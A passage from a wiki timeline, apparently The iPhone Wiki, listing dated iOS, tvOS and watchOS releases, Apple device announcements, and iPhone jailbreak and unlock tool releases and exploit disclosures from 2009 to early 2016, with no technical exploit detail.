* 10 March -- tvOS 9.2 beta 6 released.
* 7 March -- iOS 9.3 beta 6 and watchOS 2.2 beta 6 released.
* 1 March -- iOS 9.3 beta 5, tvOS 9.2 beta 5 and watchOS 2.2 beta 5 released.

=== February ===
* 25 February -- [[Apple TV (3rd generation)]] software 7.2.1 released.
* 22 February -- iOS 9.3 beta 4, tvOS 9.2 beta 4 and watchOS 2.2 beta 4 released.
* 18 February -- iOS 9.2.1 (13D20) for [[N61AP|iPhone 6]], [[N56AP|iPhone 6 Plus]], [[iPhone 6s]], [[iPhone 6s Plus]], [[iPad mini 3]], [[iPad mini 4]], [[iPad Air 2]], and [[iPad Pro (12.9-inch)]] released.
* 8 February -- tvOS 9.2 beta 3, watchOS 2.2 beta 3 and iOS 9.3 beta 3 released.

=== January ===
* 25 January -- tvOS 9.1.1, 9.2 beta 2, watchOS 2.2 beta 2 and iOS 9.3 beta 2 released.
* 19 January -- iOS 9.2.1 released.
* 14 January -- iOS 9.3 beta 1.1 released.
* 11 January -- iOS 9.3, tvOS 9.1.1, tvOS 9.2 beta, and watchOS 2.2 beta released.
* 4 January -- iOS 9.2.1 beta 2 released.

== 2015 ==
=== December ===
* 25 December -- TaiG 2.4.5 released.
* 16 December -- iOS 9.2.1 beta seeded to developers.
* 8 December -- iOS 9.2, tvOS 9.1 and watchOS 2.1 released.

=== November ===
* 30 November -- TaiG 2.4.4 released (no longer beta).
* 20 November -- TaiG 2.4.4 beta released.
* 18 November -- iOS 9.2 beta 4 and tvOS 9.1 beta 3 released.
* 17 November -- iOS 9.1 (13B144) for iPad Pro (12.9-inch) released.
* 11 November -- [[iPad Pro (12.9-inch)]] released.
* 10 November -- iOS 9.2 beta 3 and tvOS 9.1 beta 2 released
* 9 November -- tvOS 9.0.1 released.
* 3 November -- iOS 9.2 beta 2 and tvOS 9.1 beta released.

=== October ===
* 29 October -- iOS 9.2 public beta and tvOS 9.0 released.
* 28 October -- [[Pangu9]] 1.0.0 for Mac released.
* 27 October -- [[Pangu9]] 1.2.0 and iOS 9.2 beta released.
* 22 October -- [[Seas0nPass]] 0.9.7 beta released to jailbreak [[K66AP|Apple TV (2nd generation)]] running 6.2.1 tethered.
* 21 October -- [[Pangu9]] 1.1.0, iOS 9.1, tvOS 9.0GM, watchOS 2.0.1 and iTunes 12.3.1 released.
* 15 October -- [[Pangu9]] 1.0.1 released.
* 14 October -- [[Pangu9]] 1.0.0 released to jailbreak iOS 9.0, 9.0.1 and 9.0.2.
* 12 October -- iOS 9.1 beta 5 released.
* 6 October -- iOS 9.1 beta 4 and tvOS 9.0 beta 3 released.

=== September ===
* 30 September -- iOS 9.0.2 and 9.1 beta 3 released.
* 24 September -- iOS 9.0.1 released for iPhone 6s and iPhone 6s Plus.
* 23 September -- iOS 9.0.1 (excluding iPhone 6s and iPhone 6s Plus) , 9.1 beta 2 and tvOS 9.0 beta 2 released.
* 21 September -- watchOS 2.0 released to the public.
* 16 September -- iOS 9.0 released to the public.
* 9 September -- iOS 9.0 [[Golden Master|GM]], watchOS 2.0 [[Golden Master|GM]] and iOS 9.1 beta released to developers. [[iPhone 6s]], [[iPhone 6s Plus]], [[iPad Pro (12.9-inch)]], [[iPad mini 4]] and [[J42dAP|Apple TV HD]] announced.

=== August ===
* 13 August -- iOS 8.4.1 and iTunes 12.2.2 released.
* 6 August -- iOS 9.0 beta 5 and watchOS 2.0 beta 5 released.
* 4 August -- TaiG 1.1.0 for Mac released.
* 2 August -- TaiG 1.0.0 for Mac released.

=== July ===
* 30 July -- iOS 8.4.1 beta 2 released.
* 21 July -- iOS 9.0 beta 4 and watchOS 2.0 beta 4 released.
* 20 July -- [[TaiG]] 2.4.3 released, no longer a beta.
* 16 July -- [[TaiG]] 2.4.3 beta released, optimises jailbreak process.
* 15 July -- [[N102AP|iPod touch (6th generation)]] released.
* 14 July -- iOS 8.4.1 beta released.
* 13 July -- [[TaiG]] 2.4.2 Beta released, fixes 30% and 40% issues as well as bundling Cydia 1.1.23. [[PPJailbreak]] 2.0.0 released to jailbreak iOS 8.1.3 - 8.4 on Mac.
* 11 July -- [[TaiG]] 2.4.1 released.
* 10 July -- [[TaiG]] 2.4.1 Beta released, fixes 60% issue.
* 7 July -- [[TaiG]] 2.3.1 released.
* 6 July -- [[TaiG]] 2.3.1 Beta released, includes Cydia 1.1.20.
* 3 July -- [[TaiG]] 2.3.0 released, which removes the setruid-patch
* 2 July -- [[TaiG]] 2.2.1 released to address a security vulnerability allowing all apps to get root easily.

=== June ===
* 30 June -- iOS 8.4 released. [[TaiG]] 2.2.0 released to jailbreak iOS 8.4.
* 23 June -- [[TaiG]] 2.0.0 released to jailbreak iOS 8.1.3, 8.2 and 8.3.
* 8 June -- Apple announces iOS 9, watchOS 2.0, and a release date of June 30 for iOS 8.4 at [[WWDC]] 2015.

=== May ===
* 15 May -- [[User:geohot|geohot]] [[The iPhone Wiki:Changing Ownership|transfers]] ownership of The iPhone Wiki to [[User:saurik|saurik]].

=== April ===
* 23 April -- iOS 8.2 (build 12S506) released for Apple Watch.
* 8 April -- iOS 8.3 and Apple TV 7.2 released.

=== March ===
* 9 March -- iOS 8.2 released.

=== February ===
* 23 February -- [[TaiG]] updated to version 1.3 to support iOS 8.2 beta and beta 2.
* 12 February -- [[TaiG]] updated to version 1.2.1 to support iTunes 12.1.

=== January ===
* 27 January -- iOS 8.1.3 and 7.0.3 (8.1.3) for Apple TV released.
* 18 January -- [[PPJailbreak]] released to jailbreak iOS 8.0 - 8.1.2 on a Mac.

== 2014 ==
=== December ===
* 9 December -- iOS 8.1.2 released.

=== November ===
* 29 November -- [[TaiG]] released to jailbreak iOS 8.0 - 8.1.1 on all devices except Apple TV.
* 18 November -- iOS 8.1.1 and Apple TV 7.0.2 released.

=== October ===
* 22 October -- [[Pangu8]] for iOS 8.x released.
* 20 October -- iOS 8.1 released.
* 16 October -- [[iPad Air 2]] and [[iPad mini 3]] announced.

=== September ===
* 25 September -- iOS 8.0.2 released.
* 24 September -- iOS 8.0.1 released. Critical bugs affecting Touch ID and cellular service was quickly discovered[http://support.apple.com/kb/HT6487] and the update was retracted.
* 19 September -- Initial release of [[N61AP|iPhone 6]] and [[N56AP|iPhone 6 Plus]].
* 17 September -- iOS 8.0 is released to the public, as well as 6.2.1 for the [[K66AP|Apple TV (2nd generation)]].
* 9 September -- Apple announces the [[Apple Watch (1st generation)]], [[N61AP|iPhone 6]], and [[N56AP|iPhone 6 Plus]].

=== June ===
* 30 June -- iOS 7.1.2 and Apple TV 6.2 released to fix iBeacon connectivity, mail attachments not being encrypted and a bug with data transfers from third party accessories.
* 29 June -- [[Pangu]] 1.1.0 released with lots of improvements.
* 23 June -- [[Pangu]] released to jailbreak iOS 7.1.x untethered.
* 1 June -- [[p0sixspwn]] updated to version 1.0.8 to support iOS 6.1.6 and fix iTunes 11.1+ crashes.

=== April ===
* 22 April -- [[iOS]] 7.1.1 and Apple TV 6.1.1 released with bug fixes, including [[Touch ID]] fixes.

=== March ===
* 27 March -- [[evasi0n7]] updated to 1.0.8 to support iOS 7.0 (11A466) that shipped with some 5s and 5c iPhones
* 10 March -- [[iOS]] 7.1, Apple TV iOS 6.1, [[J73AP|iPad Air (iPad4,3)]] and [[J87AP|iPad mini 2 (iPad4,6)]] released.
* 1 March -- [[evasi0n7]] updated to 1.0.7 to fix problem where bundled repository package information could not be refreshed/updated by Cydia and updated bundled Cydia package lists.

=== February ===
* 26 February -- [[iTunes]] updated to 11.1.5 to fix crashing and improve iBooks compatibility on OS X.
* 22 February -- [[evasi0n7]] updated to version 1.0.6 to support iOS 7.0.6.
* 21 February -- [[iOS]] 7.0.6 and iOS 6.1.6 released to address faulty SSL validation.
* 5 February -- [[evasi0n7]] updated to version 1.0.5 to support iOS 7.0.5.

=== January ===
* 29 January -- [[iOS]] 7.0.5 released for [[N49AP|iPhone 5c (iPhone5,4)]] and [[N53AP|iPhone 5s (iPhone6,2)]], fixing network provisioning.
* 22 January -- [[iTunes]] 11.1.4 released, adding Wish List and language improvements.
* 12 January -- [[evad3rs]] releases [[evasi0n7]] 1.0.4 to fix important untether security bugs.
* 11 January -- [[evad3rs]] releases [[evasi0n7]] 1.0.3 to fix [[iPad mini 2]] bootloop issues, support iOS 7.1 beta 3 and include [[Cydia]] 1.1.9.

== 2013 ==
=== December ===
* 31 December -- [[evad3rs]] releases [[evasi0n7]] 1.0.2 to fix [[iPad 2]] bootloop issues.
* 30 December -- [[User:Ih8sn0w|iH8sn0w]], [https://twitter.com/SquiffyPwn SquiffyPwn], and [[User:winocm|winocm]] release [[p0sixspwn]], an [[untethered jailbreak]] for iOS 6.1.3 through 6.1.5, for Mac OS X.
* 24 December -- [[evad3rs]] releases [[evasi0n7]] 1.0.1 to completely remove Chinese piracy store.
* 22 December -- [[evad3rs]] releases [[evasi0n7]], an [[untethered jailbreak]] for iOS 7.0 through 7.0.4.

=== November ===
* 14 November -- [[iOS]] 7.0.4, 6.1.5 for iPod touch (4th generation) to fix [[FaceTime]] bugs and [[List of Apple TVs|Apple TV]] 6.0.2 released.
* 1 November -- [[iPad Air]] released.

=== October ===
* 24 October -- Apple TV firmware updated to 6.0.1.
* 22 October -- [[iOS]] 7.0.3 released to fix various bugs including a passcode bug. [[iPad Air]] and [[iPad mini 2]] announced.

=== September ===
* 26 September -- [[iOS]] 7.0.2 released to address Lock screen issues.
* 23 September -- Apple releases a patched version of the Apple TV 6.0 update.
* 20 September -- Initial release of [[iPhone 5c]] and [[iPhone 5s]]. iOS 7.0.1 is also made available for these devices. A 6.0 update for the Apple TV was also released, but is pulled due to problems.[http://www.macrumors.com/2013/09/22/apple-pulls-apple-tv-6-0-update-following-reports-of-bricking/]
* 18 September -- [[iOS]] 7.0 released for the [[iPad 2]] and newer, [[iPad mini]], [[iPhone 4]] and newer, [[iPod touch (4th generation)]].
* 10 September -- Apple announces the [[iPhone 5c]] and [[iPhone 5s]].

=== June ===
* 25 June -- [[iFaith]] 1.5.9 released.
* 19 June -- Apple TV firmware 5.3 released.
* 10 June -- Apple unveils a completely-revamped [[iOS]] 7 at [[WWDC]].

=== May ===
* 30 May -- Apple quietly unveils a 16 GB version of the [[N78aAP|iPod touch (5th generation)]] that omits the rear camera, replacing the [[N81AP|iPod touch (4th generation)]].
* 2 May -- [[iOS]] 6.1.4 released for [[iPhone 5]].

=== April ===
* 13 April -- [[iFaith]] updated to version 1.5.8.
* 11 April -- [[Sn0wbreeze]] updated to version 2.9.14.
* 10 April -- [[iFaith]] updated to version 1.5.7.

=== March ===
* 10 March -- [[iFaith]] updated to version 1.5.6.
* 19 March -- Apple releases [[iOS]] 6.1.3 to patch multiple security-related bugs and improve Maps for Japanese users.
* 12 March -- [[evad3rs]] updated [[evasi0n]] to 1.5.3.
* 11 March -- [[evad3rs]] updated [[evasi0n]] to 1.5.2.
* 10 March -- [[iFaith]] updated to version 1.5.5.
* 5 March -- [[evad3rs]] updated [[evasi0n]] to 1.5.1.

=== February ===
* 23 February -- [[iFaith]] updated to version 1.5.4.
* 23 February -- [[evad3rs]] updated [[evasi0n]] to 1.5. [[iFaith]] updated to version 1.5.3.
* 19 February -- Apple releases [[iOS]] 6.1.2 as a hotfix to address Exchange issues. [[Evasi0n]] was updated to support iOS 6.1.2 later the same day.
* 13 February -- [[Seas0nPass]] updated to support [[iOS]] 5.2 for the [[K66AP|Apple TV (2nd generation)]] [[untethered jailbreak]].
* 11 February -- Apple releases [[iOS]] 6.1.1 for the [[N94AP|iPhone 4s]] as a hotfix to address connectivity issues. [[evasi0n]] was updated to support [[iOS]] 6.1.1 later the same day.
* 4 February -- The [[evad3rs]] release [[evasi0n]] to [[jailbreak]] [[iOS]] 6.x.

=== January ===
* 28 January -- Apple releases [[iOS]] 6.1.

== 2012 ==
=== December ===
* 18 December -- Apple releases [[iOS]] 6.0.2 containing bug fixes for the [[iPhone 5]] and [[iPad mini]].

=== November ===
* 30 November -- Apple releases [[iTunes]] 11.
* 12 November -- [[sn0wbreeze]] is updated to version 2.9.7.
* 2 November -- Inital release of [[iPad (4th generation)]] and [[iPad mini]] in first set of countries.
* 1 November -- Apple releases [[iOS]] 6.0.1.

=== October ===
* 23 October -- Apple announces new [[iPad (4th generation)]] and [[iPad mini]].
* 14 October -- The [[iPhone Dev Team]] releases [[redsn0w]] 0.9.15b1, which lets A5(X) users with the appropriate [[SHSH]] blobs remain on, or update to, [[iOS]] 5.x.

=== September ===
* 21 September -- Initial release of [[iPhone 5]] in first set of countries.
* 19 September -- Apple releases [[iOS]] 6.
* 12 September -- Apple announces new [[iPhone 5]] and release date of iOS 6.

=== June ===
* 18 June -- [[iPhone Dev Team]] releases a new version of [[redsn0w]] (0.9.14b1), adding the capability to downgrade iPhone [[N82AP|3G]]/[[N88AP|3GS]] [[Baseband]] from the [[06.15.00]] iPad baseband to the latest unlockable iPhone baseband ([[05.13.04]]). This allows 3G/3GS users that had upgraded to the iPad baseband, thus losing the GPS function and the ability to restore to stock firmware, to get back to an iPhone baseband, making their devices behave as intended again, as well as being unlockable by [[ultrasn0w]].
* 14 June -- [[iPhone Dev Team]] releases a developer version of [[redsn0w]] (0.9.13dev1), which jailbreaks [[limera1n]] susceptible devices running [[iOS]] 6.0 beta. This version doesn't hacktivate nor install [[Cydia]], as it hasn't been ported to [[iOS]] 6 just yet. This jailbreak, however, installs afc2 and SSH, enabling developers to fix and prepare their apps to the next [[iOS]] version.
* 11 June -- Apple announces [[iOS]] 6 at [[WWDC]] 2012, and seeds the first beta to developers.

=== May ===
* 25 May -- The [[Chronic Dev (team)|Chronic Dev Team]] releases [[Absinthe]] 2.0, providing an [[untethered jailbreak]] for all devices except the [[Apple TV]]s and [[K93AAP|iPad 2 (iPad2,4)]]. ([[Seas0nPass]] was also updated to include [[Absinthe]]'s [[untethered jailbreak|untether]] for the [[K66AP|Apple TV (2nd generation)]].)
* 7 May -- Apple releases [[iOS]] 5.1.1.

=== March ===
* 7 March -- Apple releases [[iOS]] 5.1 and announces new devices: [[iPad (3rd generation)]], [[J33AP|Apple TV (3rd generation)]], and the [[K93AAP|iPad 2 (iPad2,4)]].

=== January ===
* 20 January -- [[Absinthe]] was released to [[jailbreak]] and [[untethered jailbreak|untether]] the [[A5]] devices running [[iOS]] 5.0 and 5.0.1.
* 18 January -- Apple announces [[iBooks.app|iBooks version 2.0]].

== 2011 ==
=== December ===
* 30 December -- [[User:pod2g|pod2g]]'s [[untethered jailbreak|untether]] for [[iOS]] 4.4.4 makes its way into a new version of [[Seas0nPass]] for [[K66AP|Apple TV (2nd generation)]] owners.
* 27 December -- [[User:pod2g|pod2g]]'s [[untethered jailbreak|untether]] for [[iOS]] 5.0.1 is released in new versions of [[PwnageTool]] and [[redsn0w]], and as a Cydia package called [[Corona]] (by the [[Chronic Dev (team)|Chronic Dev Team]]) for devices already jailbroken on 5.0.1.
* 15 December -- Apple releases [[iOS]] 4.4.4 for the [[K66AP|Apple TV (2nd generation)]], as well as a minor update (5.0.1 build 9A406) for the [[N94AP|iPhone 4s]] to address SIM card issues.
* 4 December -- [[iFaith]] 1.4 is released, which can circumvent the [[APTicket]] [[nonce]] on devices vulnerable to [[limera1n]]'s exploit.

=== November ===
* 10 November -- [[iOS]] 5.0.1 is released in an attempt to fix battery-related issues. It's the first non-beta available as an [[OTA Updates|OTA update]].

=== October ===
* 14 October -- The [[N94AP|iPhone 4s]] is officially released, although some preorders were delivered early.
* 12 October -- [[iOS]] 5.0 is released. The [[N94AP|iPhone 4s]] IPSW came with [[04.11.08]] due to a goof on Apple's side.
* 5 October -- Steve Jobs passes away.
* 4 October -- Apple announces the new [[N94AP|iPhone 4s]].

=== September ===
* 19 September -- [[redsn0w]] 0.9.9 beta 1 is released, introducing a new UI and many features (like submitting [[SHSH]]s to the [[Cydia Server]].
* 17 September -- [[MyGreatFest]], first iCommunity and jailbreak centered convention was held.

=== July ===
* 15 July -- Apple releases [[iOS]] 4.2.9 and 4.3.4, patching all jailbreaking-related vulnerabilities (aside from those in the [[bootrom]]).
* 6 July -- [[User:Comex|comex]] releases [[Saffron]], the first public [[jailbreak]] for the [[iPad 2]].
* 2 July -- A beta version of the upcoming [[jailbreak]] from [[User:comex|comex]] for the [[iPad 2]], making use of a PDF exploit, was leaked. A hotfix by Apple is expected very soon.

=== June ===
* 1 June -- [[User:ih8sn0w|iH8sn0w]] releases [[iFaith]] to dump [[SHSH]] blobs from a device.

=== May ===
* 6 May -- [[PwnageTool]], [[redsn0w]], and [[sn0wbreeze]] are updated for [[iOS]] 4.3.3 support (and in the case of sn0wbreeze, [[iOS]] 4.2.8 support as well).
* 3 May -- Apple releases [[iOS]] 4.2.8 and 4.3.3 to address the location-tracking controversy. Once more, current [[untethered jailbreak|untethering]] vulnerabilities remained unpatched.

=== April ===
* 24 April -- [[PwnageTool]], [[redsn0w]], and [[sn0wbreeze]] are updated for [[iOS]] 4.3.2 support (and in the case of sn0wbreeze, [[iOS]] 4.2.7 support as well).
* 14 April -- Apple releases [[iOS]] 4.2.7 and 4.3.2 to fix security issues and connection issues for [[K95AP|iPad 2 (iPad2,3)]], but leaves [[untethered jailbreak|untethering]] vulnerabilities unpatched.
* 3 April -- All major jailbreak tools ([[redsn0w]], [[PwnageTool]], [[sn0wbreeze]]) get updated to includes [[i0n1c]]'s [[untethered jailbreak|untether]] code to jailbreak devices compatible with iOS 4.3.1 except the [[iPad 2]].

=== March ===
* 25 March -- Apple releases iOS 4.3.1, properly blocking [[User:comex|comex]]'s [[IOSurface Kernel Exploit|exploit]].
* 13 March -- [[User:Comex|comex]] shows a remotely jailbroken [[K95AP|iPad 2 (iPad2,3)]].
* 11 March -- Release of the [[iPad 2]] in the USA. The exploits for [[limera1n]] ([[User:Geohot|geohot]]), [[SHA-1 Image Segment Overflow|SHAtter]] ([[User:posixninja|p0sixninja]]), and [[comex]]'s [[kernel]] exploit were closed by Apple.
* 9 March -- Apple releases [[iOS]] 4.3, fixing the [[HFS Legacy Volume Name Stack Buffer Overflow]] vulnerability.

=== February ===
* 15 February -- New version of both [[PwnageTool]] and [[sn0wbreeze]] were released to support 4.2.1 and untethered using the [[feedface]] exploit.
* 7 February -- The [[Chronic Dev (team)|Chronic Dev Team]] release a version of [[greenpois0n (jailbreak)|greenpois0n]] to jailbreak the [[N92AP|iPhone 4 (iPhone3,3)]], using the [[HFS Legacy Volume Name Stack Buffer Overflow]].
* 3 February -- [[User:Jaywalker|Jaywalker]] of the [[Chronic Dev (team)|Chronic Dev Team]] posts [https://www.youtube.com/watch?v=T3NYPVT13xw a video] of custom boot using a soon to be released version of [[Greenpois0n (jailbreak)|greenpois0n]].

=== January ===
* 12 January -- Apple discontinues [[iOS]] support for [[N82AP|iPhone 3G]] and [[N72AP|iPod touch (2nd generation)]] since today's beta release of [[iOS]] 4.3. Also first time a beta [[iOS]] for [[K66AP|Apple TV (2nd generation)]] is released.
* 11 January -- Verizon announces [[N92AP|iPhone 4 (iPhone3,3)]].

== 2010 ==
=== November ===
* 28 November -- [[ultrasn0w]] 1.2 is released by the [[iPhone Dev Team]] to unlock [[N82AP|iPhone 3G]] and [[N88AP|iPhone 3GS]] on baseband 6.15.00
* 22 November -- Apple releases [[iOS]] 4.2.1 (respectively 4.2 for [[K66AP|Apple TV (2nd generation)]])

=== October ===
* 31 October -- The [[iPhone Dev Team|Dev Team]] releases [[redsn0w]] 0.9.6b2 which jailbreaks [[iOS]] 4.1, 4.2 and 3.2.2 on every device available at the time of release (except for iPod touch (2nd generation) MC). It also includes "DFU" button allowing to flash custom [[IPSW]] from Windows [http://blog.iphone-dev.org/post/1452044444/redsn0w-limera1n-fun (see blog post)].
* 20 October -- The [[iPhone Dev Team|Dev Team]] releases [[PwnageTool]] 4.1 which jailbreaks [[iOS]] 4.1 and 3.2.2 on every device available at the time of release. [http://blog.iphone-dev.org/post/1359246784/20102010-event (see blog post)]
* 18 October -- [[Chronic Dev (team)|Chronic Dev Team]] releases [[Greenpois0n (jailbreak)|greenpois0n]] RC4 which added support for iPod touch (2nd generation) (MC and MB) for an untethered jailbreak using [[User:comex|comex]]'s kernel exploit and the [[usb_control_msg(0xA1, 1) Exploit]].
* 12 October -- [[Chronic Dev (team)|Chronic Dev Team]] releases [[Greenpois0n (jailbreak)|greenpois0n]] after switching its exploit from [[SHA-1 Image Segment Overflow|SHAtter]] to [[limera1n]], in the hope that [[SHA-1 Image Segment Overflow|SHAtter]] remains for 5th generation devices. (The exploit [[limera1n]] uses was fixed in the [[iBoot (Bootloader)|iBoot]] revision found in [[iOS]] 4.2 beta 2, which means Apple knows about the vulnerability and the next [[bootrom]] revision may have it patched.)
* 10 October -- Following the first [[limera1n]] beta release, [[User:geohot|geohot]] released multiple versions, each fixing bugs affecting previous releases. [[Chronic Dev (team)|Chronic Dev Team]] officialy anounces that, in order to keep [[SHA-1 Image Segment Overflow|SHAtter]] undisclosed and possibly preserve it for 5th generation devices, [[Greenpois0n (jailbreak)|greenpois0n]] would be delayed in order to incorporate this new exploit [[limera1n]] uses.
* 9 October -- In order to push [[Chronic Dev (team)|Chronic Dev Team]] to change the exploit used on [[Greenpois0n (jailbreak)|greenpois0n]], [[User:geohot|geohot]] rushed out a beta version of [[limera1n]].
* 8 October -- [[User:Geohot|Geohot]] comes back to the scene with a new [[bootrom]] exploit believed to work on all devices, as shown on the resurrected [http://www.limera1n.com limera1n web site]. He prompts [[Chronic_Dev_(team)|Chronic Dev Team]] to use his exploit instead of [[SHA-1 Image Segment Overflow|SHAtter]], but, since [[Greenpois0n (jailbreak)|greenpois0n]] is already scheduled to October 10, it may be not possible. [[User:Geohot|Geohot]] ETA'd his [[limera1n]] release to October 11, if [[Greenpois0n (jailbreak)|greenpois0n]] can't be changed to use this new exploit. This decision, however, would burn 2 [[bootrom]] exploits: [[SHA-1 Image Segment Overflow|SHAtter]] itself and the one used by [[limera1n]], which is unpatchable by firmware updates.
* 6 October -- Chronic Dev Team issues expected ETA of [[Greenpois0n (jailbreak)|greenpois0n]] as October 10, featuring the new [[SHA-1 Image Segment Overflow|SHAtter]] exploit for devices with the [[S5L8930]].

=== September ===
* 30 September -- [[User:MuscleNerd|MuscleNerd]] of the [[iPhone Dev Team]] posts [http://www.youtube.com/watch?v=adVp-IxcDHI the first video] of an [[K66AP|Apple TV (2nd generation)]] jailbroken via [[SHA-1 Image Segment Overflow|SHAtter]].
* 27 September -- [[User:MuscleNerd|MuscleNerd]] of the [[iPhone Dev Team]] posts [http://www.youtube.com/watch?v=aoX1Q8ym2J8 the first video] of an [[N81AP|iPod touch (4th generation)]] jailbroken via [[SHA-1 Image Segment Overflow|SHAtter]].
* 20 September -- [[User:pod2g|pod2g]] discloses details about the [[usb_control_msg(0xA1, 1) Exploit‎]] here at The iPhone Wiki. It was used in [[redsn0w]] the following day.
* 9 September -- The existence of [[SHA-1 Image Segment Overflow|SHAtter]] is revealed. Further details were not released, however.
* 8 September -- Apple releases the [[N81AP|iPod touch (4th generation)]], and iOS 4.1, closing the [[AT+XAPP Vulnerability]].
* 1 September -- Apple event. They announced the new [[N81AP|iPod touch (4th generation)]], [[K66AP|Apple TV (2nd generation)]], iOS 4.1, and [[iTunes]] 10.

=== August ===
* 12 August -- [[Saurik]] releases the first version of PDF Patcher, which installs Apple's patch for the FreeType vulnerability (used in conjunction with other exploits by [[Star]]). It works on firmwares as far back as 2.x, and renders [[iOS]] 3.2.2 and 4.0.2 useless for jailbreakers. Jailbreaking and installing this patch is currently the only way for users of first generation iPod touches and iPhones to protect themselves against malicious use of the exploit.
* 11 August -- Apple releases [[iOS]] 4.0.2 for [[List of iPhones|iPhone]]/[[List of iPod touches|iPod touch]] and [[iOS|iPhone OS]] 3.2.2 for [[K48AP|iPad]] as a hotfix for [[Star]]'s exploits. [[Ultrasn0w]]'s exploit remains, since there's no [[Baseband Firmware|baseband]] update on those versions.
* 3 August -- Just before midnight in [[User:planetbeing|planetbeing]]'s timezone [[ultrasn0w]] has been released by the [[iPhone Dev Team]] to [[unlock]] the [[N90AP|iPhone 4]].
* 1 August -- [[User:Comex|comex]] releases [[Star]], a [[jailbreak]] for all iDevices with [[iOS|iPhone OS]] 3.1.2 through [[iOS]] 4.0.1.

=== July ===
* 30 July -- [[N90AP|iPhone 4]] is released in major countries (second wave).
* 26 July -- Jailbreaking is now officially legal in the U.S.A.: [http://www.eff.org/press/archives/2010/07/26 EFF Wins New Legal Protections for Cell Phone Jailbreakers and Unlockers]
* 15 July -- Apple releases [[iOS|iPhone OS]] 3.2.1 and [[iOS]] 4.0.1.

=== June ===
* 24 June -- [[N90AP|iPhone 4]] is launched.
* 22 June -- [[iPhone Dev Team]] releases [[PwnageTool]] 4.0 and later 4.0.1 for all devices on 4.0 except those with newer [[bootrom]]s (some [[N72AP|iPod touch (2nd generation)]] and [[N88AP|iPhone 3GS]] devices, and all [[N18AP|iPod touch (3rd generation)]] and newer devices).
* 21 June -- [[iPhone Dev Team]] releases [[redsn0w]] 0.9.5 to [[jailbreak]] 4.0 on [[N82AP|iPhone 3G]] and [[N72AP|iPhone touch (2nd generation)]] ([[Bootrom 240.4|old bootrom]]), [[iPhone Dev Team]] releases [[ultrasn0w]] 0.93, an unlock for baseband firmwares [[04.26.08]], [[05.11.07]], [[05.12.01]], and [[05.13.04]] and Apple releases [[iOS]] 4.0
* 19 June -- [[User:Geohot|geohot]] holds a speech at the [[Nuit du hack 2010|Nuit du Hack]]

=== May ===
* 3 May -- Windows version of [[Spirit]] has been updated to not require Windows 98 compatibility mode to run and fixed a photo deletion issue.
* 2 May -- [[User:Comex|comex]] releases [[Spirit]], an [[untethered jailbreak]] for all iDevices with [[iOS|iPhone OS]] 3.1.2 through 3.2.

=== April ===
* 3 April -- Apple releases the [[K48AP|iPad]].

=== February ===
* 12 February -- [[User:sherif hashim|sherif_hashim]] discovers [[AT+XAPP Vulnerability]] and passes it to [[User:MuscleNerd|MuscleNerd]], an elite member of the [[iPhone Dev Team]]
* 2 February -- Apple releases [[iOS|iPhone OS]] 3.1.3, closing [[usb_control_msg(0x21, 2) Exploit|usb_control_msg(0x21, 2)]] vulnerability used by [[blackra1n]], [[redsn0w]], et. al.

== 2009 ==
=== November ===
* 3 November -- [[User:Geohot|geohot]] releases [[blackra1n]] RC3, a software jailbreak for all devices. Includes a new unlock for baseband [[05.11.07]] called [[blacksn0w]] and is also noticeably faster than previous versions.

=== October ===
* 11 October -- [[User:Geohot|geohot]] releases [[blackra1n]] RC1, a 30 second software jailbreak for all devices, including a [[tethered jailbreak]] for the [[N18AP|iPod touch (3rd generation)]], and [[N88AP|iPhone 3GS]] and [[N72AP|iPod touch (2nd generation)]] units with newer bootrom revisions.

=== September ===
* 24 September -- [[User:iH8sn0w|iH8sn0w]] discovers the [[AT+XEMN Heap Overflow|AT+XEMN]] crash independently.
* 9 September -- The [[N18AP|iPod touch (3rd generation)]] with [[S5L8922]] processor is released. [[N72AP|iPod touch (2nd generation)]] and [[N88AP|iPhone 3GS]] units continue shipping, but with a new bootrom ([[Bootrom 240.5.1|240.5.1]] and [[Bootrom 359.3.2|359.3.2]] respectively) that is no longer vulnerable to the [[0x24000 Segment Overflow]].
* 9 September -- Apple releases [[iOS|iPhone OS]] 3.1 (7C144) for iPhones and 3.1.1 (7C145) for iPod touches, closing the [[iBoot Environment Variable Overflow]] and [[AT+XLOG Vulnerability|AT+XLOG]] + [[AT+FNS]] Baseband Exploits.

=== July ===
* 14 July -- [[User:Geohot|geohot]] releases [[purplesn0w]], a software unlock for the [[X-Gold 608]] using [[AT+XLOG Vulnerability|the same exploit as ultrasn0w]], but handled differently. Minutes later, an explanation and source code was posted.
* 7 July -- The [[iPhone Dev Team]] updates [[redsn0w]] and [[ultrasn0w]] to version 0.8, now with [[N88AP|iPhone 3GS]] support. Saurik also updates [[WinterBoard]] to support the [[N88AP|iPhone 3GS]].
* 3 July -- [[User:Geohot|geohot]] releases [[purplera1n]], a software [[jailbreak]] for the [[N88AP|iPhone 3GS]].

=== June ===
* 28 June -- [[User:Geohot|geohot]] posts pictures on his blog of the first fully jailbroken [[N88AP|iPhone 3GS]].
* 25 June -- It's discovered that [[N88AP|iPhone 3GS]] is vulnerable to the [[0x24000 Segment Overflow]].
* 24 June -- The [[iPhone Dev Team]] releases [[ultrasn0w]], an [[unlock]] for [[X-Gold 608]] thanks to [[AT+XLOG Vulnerability|a new exploit]] discovered by [[User:Oranav|Oranav]].
* 23 June -- [[User:Geohot|geohot]] announces he's found a new exploit in [[iBoot (Bootloader)|iBoot]] he calls [[purplera1n]].
* 19 June -- Release of [[N88AP|iPhone 3GS]] to the public and the release of [[PwnageTool]] 3.0 and [[redsn0w]] for jailbreaking devices running [[iOS|iPhone OS]] 3.0
* 17 June -- Apple releases [[iOS|iPhone OS]] 3.0.
* 8 June -- Apple announces the [[N88AP|iPhone 3GS]].

=== March ===
* 10 March -- Information about the [[0x24000 Segment Overflow]] exploit used for the [[N72AP|iPod touch (2nd generation)]] [[untethered jailbreak]] is released thanks to the combined work of [[chronic]], [[CPICH]], [[User:Posixninja|posixninja]], [[User:Pod2g|pod2g]], [[ius]], [[planetbeing]], [[User:MuscleNerd|MuscleNerd]], and co. after being leaked and sold by [[NitroKey]]. To prevent users wasting their money on a stolen exploit, the Hybrid DevTeam decided to release it immediately.

=== January ===
